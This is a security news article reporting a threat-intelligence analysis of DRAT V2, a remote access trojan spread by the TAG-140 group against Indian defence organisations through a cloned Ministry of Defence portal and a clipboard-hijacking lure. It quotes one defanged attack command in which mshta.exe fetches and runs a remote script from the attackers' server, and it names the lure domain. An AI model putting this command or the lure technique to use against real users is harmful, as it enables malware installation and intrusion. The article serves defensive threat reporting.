Wednesday, September 16, 2026
Follow on LinkedIn

New DRAT V2 Updates C2 Protocol Expands Functional Capabilities With Shell Command Execution

A sophisticated evolution in the cyber threat landscape has emerged with the discovery of DRAT V2, a significantly enhanced remote access trojan that demonstrates the continuing advancement of state-aligned threat actors targeting critical infrastructure.

This latest iteration represents a strategic shift from its .NET predecessor to a Delphi-compiled variant, introducing expanded command-and-control capabilities that pose heightened risks to governmental and defense organizations across the Indian subcontinent.

The malware campaign, orchestrated by the TAG-140 threat group with established connections to SideCopy and the broader Transparent Tribe ecosystem, has demonstrated remarkable sophistication in its targeting methodology.

The group employed an elaborate social engineering scheme that involved creating a counterfeit website mimicking the Indian Ministry of Defence’s official press release portal, utilizing the deceptive domain email.gov.in.drdosurvey.info to closely resemble the legitimate government website mod.gov.in.

Recorded Future analysts identified this malicious infrastructure during their investigation of recent TAG-140 activities, revealing a meticulously crafted attack chain that leverages ClickFix-style social engineering tactics.

TAG-140 infection chain dropping DRAT V2 (Source – Recorded Future)

The campaign specifically targeted Indian defense organizations through spearphishing operations, directing victims to the cloned portal where only a single link for March 2025 press releases remained active, serving as the primary infection vector.

The technical implications of DRAT V2’s deployment extend far beyond conventional remote access capabilities, as the malware introduces a new exec_this_comm command that enables arbitrary shell command execution on compromised systems.

This enhancement significantly amplifies the threat actor’s post-exploitation flexibility, allowing for real-time interactive operations and sophisticated lateral movement across targeted networks.

The malware’s custom TCP-based, server-initiated command-and-control protocol has been updated to support both ASCII and Unicode input while maintaining ASCII-only responses, demonstrating a calculated balance between functionality and operational security.

DRAT V2 summary (Source – Recorded Future)

The emergence of DRAT V2 signals a concerning evolution in TAG-140’s operational capabilities, particularly given the group’s historical pattern of rapidly rotating between different remote access trojans including CurlBack, SparkRAT, AresRAT, and others.

This diversification strategy complicates detection efforts while maintaining persistent access to high-value targets within India’s governmental and defense sectors.

Infection Mechanism and Payload Delivery

The DRAT V2 infection chain exemplifies modern malware distribution techniques through its sophisticated multi-stage deployment process.

The attack sequence initiates when victims access the malicious portal and click on the active March 2025 link, which redirects users to a specialized URI /captcha/windows.php that presents a deceptive warning labeled “Disclosure – For Official Use Only (FOUO).”

DRAT V2 capability matrix (Source – Recorded Future)

Upon clicking “continue,” malicious JavaScript executes a clipboard hijacking operation, copying a carefully crafted command to the user’s clipboard while instructing them to paste and execute it in a command shell.

The command utilizes the Windows-native mshta.exe utility to fetch and execute a remote script from TAG-140’s infrastructure at trade4wealth.in, as shown in the following command structure:-

C:\Windows\System32\mshta.exe hxxps://trade4wealth[.]in/admin/assets/css/default/index.php

This execution triggers the deployment of the BroaderAspect loader, which serves as the primary staging mechanism for DRAT V2 installation.

The loader performs multiple critical functions including downloading a decoy PDF document to maintain the illusion of legitimate activity, establishing persistence through registry manipulation, and ultimately retrieving the compressed DRAT V2 payload from the threat actor’s infrastructure.

The persistence mechanism employs a registry entry within the Microsoft-defined autostart location, ensuring the malware maintains access across system reboots while masquerading as a legitimate system file through carefully chosen naming conventions and file placement in the C:\Users\Public directory structure.

Are you from SOC/DFIR Teams! - Interact with malware in the sandbox and find related IOCs. - Request 14-day free tria

Tushar Subhra Dutta
Tushar Subhra Dutta
Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Cyber Security Guide

Latest Cyber News

Expert Talks